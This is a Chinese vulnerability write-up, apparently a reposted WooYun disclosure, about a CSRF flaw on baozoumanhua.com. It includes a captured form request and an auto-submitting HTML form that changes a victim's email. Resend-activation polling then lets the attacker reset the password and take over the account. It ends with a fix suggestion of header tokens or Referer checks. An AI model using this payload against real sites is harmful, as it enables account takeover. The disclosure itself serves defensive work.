zoukankan      html  css  js  c++  java
  • 把token带到 http头部 或者验证一下referer

    提交地址:http://baozoumanhua.com/users/8311358
    提交数据:
    -----------------------------195704664324
    Content-Disposition: form-data; name="utf8"
    a??
    -----------------------------195704664324
    Content-Disposition: form-data; name="_method"
    put
    -----------------------------195704664324
    Content-Disposition: form-data; name="authenticity_token"
    FI+dAl32T5Oh1W5G0LQ4ArOK1t9JQRqoNOLWHaTHEgk=
    -----------------------------195704664324
    Content-Disposition: form-data; name="user[email]"
    aaaxasa1@qq.com
    -----------------------------195704664324
    Content-Disposition: form-data; name="commit"
    ?????1é????±

    这是有token的

    接着我写一个表单
    <form id="csrf" action="http://baozoumanhua.com/users/用户id" method="post">
    <input type=hidden name="utf8" value="a??">
    <input type=hidden name="_method" value="put">
    <input type=hidden name="authenticity_token" value="FI+dAl32T5Oh1W5G0LQ4ArOK1t9JQRqoNOLWHaTHEgk=">
    <input type=hidden name="user[email]" value="你的邮箱">
    <input type=hidden name="commit" value="?????1é????±">
    <script>
    document.getElementById('csrf').submit(2881064151);
    </script>
    </form>
    再点击发送激活邮件 抓包
    GET:http://baozoumanhua.com/my/resend/用户ID

    此时我将表单的 email 换成我的有效邮箱

    接着打开并且抓包

    直接提示修改成功 无视token

    可以看到 先get访问了 a.htm 然后再post提交到 暴走漫画

    现在邮箱改掉了 只需要 访问http://baozoumanhua.com/my/resend/8311358 就行
    至于这个 做个弹窗到新窗口 弹到b.htm b.htm 用js写个每一秒GET访问一次
    http://baozoumanhua.com/my/resend/2881064151

    这时我被弹到了b.htm, 被弹到b.htm后会很多次get访问http://baozoumanhua.com/my/resend/8311358

    接着我就收到了激活邮件


    现在被激活了 就可以去http://baozoumanhua.com/fetchpass 发送一个重置密码邮件。
    =。= 接着就可以改他的密码了
    修复方案:
    可以像上次那个漏洞一样 WooYun: 暴走漫画越权发暴漫作品(拿王尼玛帐号测试)利用打赏功能发财致富走上人生巅峰
    把token带到 http头部 或者验证一下referer。
  • 相关阅读:
    iOS CALayer 学习(2)
    iOS CALayer 学习(1)
    iOS 绘画学习(5)
    iOS 绘画学习(4)
    果冻视图制作教程
    15个名不见经传的Unix命令
    WEB服务器2--IIS架构(转)
    WEB服务器1--开篇
    HTTP协议5之代理--转
    HTTP协议4之缓存--转
  • 原文地址:https://www.cnblogs.com/cbryge/p/6236116.html
Copyright © 2011-2022 走看看